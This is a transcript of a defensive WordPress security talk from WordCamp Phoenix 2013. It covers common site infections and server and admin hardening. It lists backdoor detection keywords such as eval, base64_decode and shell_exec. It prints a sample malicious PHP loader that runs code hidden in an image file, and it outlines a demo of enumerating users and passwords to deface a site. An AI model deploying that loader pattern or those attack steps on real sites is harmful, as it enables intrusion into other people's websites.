WordPress Security - WordCamp phoenix 2013

WordPress Security

Dealing with Today’s Hacks

04/10/2023

If you don’t ask, you don’t get!

• Dre Armeda, CISSP• CEO, Co-Founder at Sucuri Inc.• @dremeda• Dre.im

I'm a Harley enthusiast, and a Chargers fan. I wear many hats, and love tacos. I'm infatuated with WordPress, web design, and web security. I work at Sucuri Security. I hope to help make the web a safer place!

Dre Armeda - @dremeda #wcphx

Why listen to me? You don’t have to, but…

• 12 years running IT, IS, Crypto, InfoSec & PhySec for the US Navy.– Managed security awareness for Sempra Energy– Deployed security suite for 1-800-Flowers.– Cleaned Martha Steward web properties of malware

• Not an expert, passionate enthusiast.• Seriously though – Quick Sucuri stats:

– Remediate 200 – 300 infected websites a day, • 24/7/365

– Perform 2 million + malware website scans a month– Support all CMS platforms and custom applications (e.g., WordPress, Joomla,

osCommerce, vBulletin, Drupal, .NET, etc… )

My goal in life is to make the web a safer place!

04/10/2023 Dre Armeda - @dremeda #wcphx

Thoughts To Kick Things Off

• Information Security is about risk reduction. – If you’re looking for the “silver bullet” this is the wrong

talk for you.• To think that you will never be infected is like saying

you will never be sick.– Someone tells you different – Percussion calibration time

• Prevention is ideal, but not realistic.– Risk will never be 0%– Detection is key.


Know Your Enemy

• They have time & resources• They are intelligent• Attacks are automated• Goal is to impact quantity• Own one, own them all…• It’s not personal


Ok, so what’s the problem?

TODAY’S ISSUES:• The Ecosystem /

Environment• Access Control • Software Vulnerabilities• Administration• Credential Management • Extensibility


Today’s Focus

• Ecosystem / Environment• Access Control• Dealing with Hacks


Logical Architecture

Linux Operating System

Apache

WordPress CPANEL Plesk phpMyAdmin PHP-CGI

MySQL

Modules

PHP

Modules


The EcoSystem / Environment

• Apache– Malicious module injects iFrames– http://blog.unmaskparasites.com/2012/09/10/malicious-apache-module-inject

s-iframes/

• phpMyAdmin– Mirror Hacked– http://sourceforge.net/blog/phpmyadmin-back-door/

• PHP-CGI– Remote Code Execution– http://blog.sucuri.net/2012/05/php-cgi-vulnerability-exploited-in-the-

wild.html• Plesk

– Vulnerable to SQLi attacks– http://blog.sucuri.net/2012/06/plesk-vulnerability-leading-to-malware.html


http://blog.unmaskparasites.com/2012/09/10/malicious-apache-module-injects-iframes/



http://sourceforge.net/blog/phpmyadmin-back-door/

http://sourceforge.net/blog/phpmyadmin-back-door/

http://blog.sucuri.net/2012/05/php-cgi-vulnerability-exploited-in-the-wild.html

http://blog.sucuri.net/2012/05/php-cgi-vulnerability-exploited-in-the-wild.html

http://blog.sucuri.net/2012/06/plesk-vulnerability-leading-to-malware.html

http://blog.sucuri.net/2012/06/plesk-vulnerability-leading-to-malware.html

The EcoSystem / Environment

• What can you do?– Not much… completely outside of your control if you’re

using a shared or managed host

• But, you can reduce risk...– Use a Dedicated / VPS Environment

• But recognize the responsibility that this entails, if you what I mentioned previously doesn’t make sense, skip to next step

– Go with a Managed Host• Doesn’t mean you’ll be safer, but it does mean you’ll have

resources to lean on


Access is Key

• We have to change the way we treat and think about access. All access – Server / Application

• We are going through the same mistakes servers and desktops were making in the 90’s with access.

• Know where you are surfing the web, do you really need to log in as an admin at the coffee shop?


Before We Dive In


WordPress Loving Infections

• Defacements• Backdoors• Pharma Hack• Injections– iFrame Specifically

• Malicious Redirects• Phishing


DEFACEMENTSHacktivism at its finest… you now support a cause!?!?!

Defacements

• Hacktivism 101– Annoying as S*&T

• Places to look:– Index.html– Index.php

• Root Directory• Wp-Content• Theme Directory

• GREP is your friend:– grep –ri ‘sniper399’ .


BACKDOORSIt’s ok to cry a little…

Backdoors• Common terms:

– Is_bot– Eval– Base64_decode– Fopen– Fclose– readfile– Edoced_46esad– Exec– System– Shell_exec– Gzuncompress– popen– FilesMan


PHARMA HACKErectile Dysfunction pills are leading ads.. Who knew..

Pharma Hack

• Multi-million $ Business• Rarely Distribute Malware• Impression based Affiliate Marketing• Google’s Search Engine Result Pages

(SERP)• Odds of malware distribution are

actually low• Tricks:

– Embedded within core files– Look for “.tmp” directories = >


Pharma Hack, cntd..

• Try using CURL to emulate Google and Windows:Curl –L –A “Googlebot/2.1(+http://www.google.com/bot.html)” http://someinfectedwebsite.com– Google Webmaster Tools

• Fetch as Google Bot

• Check your Theme Index.php file for things like this:– <?php

$wp__theme_icon=@create_function(”,@file_get_contents(‘/public_html/wp-content/themes/my-really-good-theme/images/s.jpg’));$wp__theme_icon(); ?>


http://someinfectedwebsite.com/

Pharma Hack, cntd..


INJECTIONSIt only hurts for a minute…

Injections

• Invisible iFrame’s - Executing on your browser• Contributing to Drive-by-Downloads, Pharma, XSS, CSRF• Places to check – Pages that generate content:

– JS files, Header.php, Index.php, Function.php, Footer.php


Injections, cntd…

• PHP iFrame Injection =>– Count##.php– Check all Index.php /

Theme JS files– Example below:


Injections, cntd…

• Pharma Link Injections =>

• Drive-By-Downloads


MALICIOUS REDIRECTSWTF?!?! Why don’t I understand what it says?

Malicious Redirects

• Redirects your user to a domain distributing malware, fundamentally different than an iframe injection that executes in your browser

• 8 out of 10 times, check your .htaccess file – all of them– # find /var/www –name .htaccess –type f | wc –l

• Check for backdoors also – often a sign of a bigger issue


PHISHINGBiggest growing problem, exceptionally difficult to detect…

Phishing

• Growing at a faster pace than traditional web-malware

• No impact to readers, but tied to SPAM bots sending out emails like this:


Phishing, cntd…


DEMONSTRATIONBringing the Point Home

Demo Objective

• Use good tools for bad things – wpscan• Enumerate the users• Enumrate Passwords• Own target WordPress site• Deface the Website

I have 5 minutes – Ready?


KEEPING IT REALRemember the risk discussion?

Update• Oldest version found in production – 1.5• Leading cause of cross-site contamination issues• Perhaps the simplest of tasks, yet we still find this:


Access is Key• On the Server:– Kill accounts that are not in use– FTP is the devil – slap yourself and switch to SFTP– Disable password auth & use key pairs

• WordPress Admin:– Multi-Factor Authentication on wp-admin– Two-Factor Authentication on wp-login.php

• Employ least privileged:– Only use admin accounts for admin tasks– Learn to use Editor, Author, Contributor, Subscriber


Password Dilemma• 15 character pass

– 3 months to crack• Long / Complex / Unique

– Key to Passwords• Prefer Password Manager

– You don’t? ok..– Passphrases work too

• iLuvWCLpHX:2013:S@nT@N b@By

• Come up with a process & stick to it:– One scheme:

• Remember 8 characters• Write Down 8 characters• Save 20 characters

– Second scheme:• Remember 20 characters• Prefix characters with site name• End sequence with some date04/10/2023 Dre Armeda - @dremeda #wcphx

Kill PHP Execution

• Kill PHP Execution – Directories:• WP-INCLUDES• WP-CONTENT• UPLOADS – At a minimum

<Files *.php>Deny from all</Files>


Disable Theme / Plugin Editor

I’d take it a step further and remove the ability to install, but that’s just me.

Modify WP-CONFIG.PHP With:

• Disable the Plugin / Theme Editor– Define(‘DISALLOW_FILE_EDIT’,true);

- OR -

• Disable the Plugin / Theme Update and Installation– Define(‘DISALLOW_FILE_MODS’,true);


Plugins That Help

Sucuri Clients• Sucuri Security Plugin• Theme-Check• BackupBuddy• Akismet

Non-Clients• Limit Login Attempts• Theme-Check• BackupBuddy• Akismet


Need a Hand?Support Forums

• Sucuri Blog: http://blog.sucuri.net• SiteCheck Scanner:

http://sitecheck.sucuri.net• Unmask Parasites:

http://unmaskparasites.com• Perishable Press:

http://perishablepress.com/category/web-design/security/

• Secunia Security Advisories: http://secunia.com/community/advisories/search/?search=wordpress

Online Resources

• Hacked – http://wordpress.org/tags/hacked

• Malware – http://wordpress.org/tags/malware

• BadwareBusters – https://badwarebusters.org


http://blog.sucuri.net/

http://sitecheck.sucuri.net/

http://unmaskparasites.com/




http://secunia.com/community/advisories/search/?search=wordpress



http://wordpress.org/tags/hacked

http://wordpress.org/tags/hacked

http://wordpress.org/tags/malware

http://wordpress.org/tags/malware

https://badwarebusters.org/

https://badwarebusters.org/

Dre Armeda, CISSPDre.im

@dremeda

Sucuri Inc.http://sucuri.net http://blog.sucuri.net

@sucuri_security


Thanks to Tony Perez @perezbox for allowing me to cannibalize his slide deck.

http://sucuri.net/

http://sucuri.net/

http://sucuri.net/

http://blog.sucuri.net/

WordPress Security - WordCamp phoenix 2013

Documents

Transcript of WordPress Security - WordCamp phoenix 2013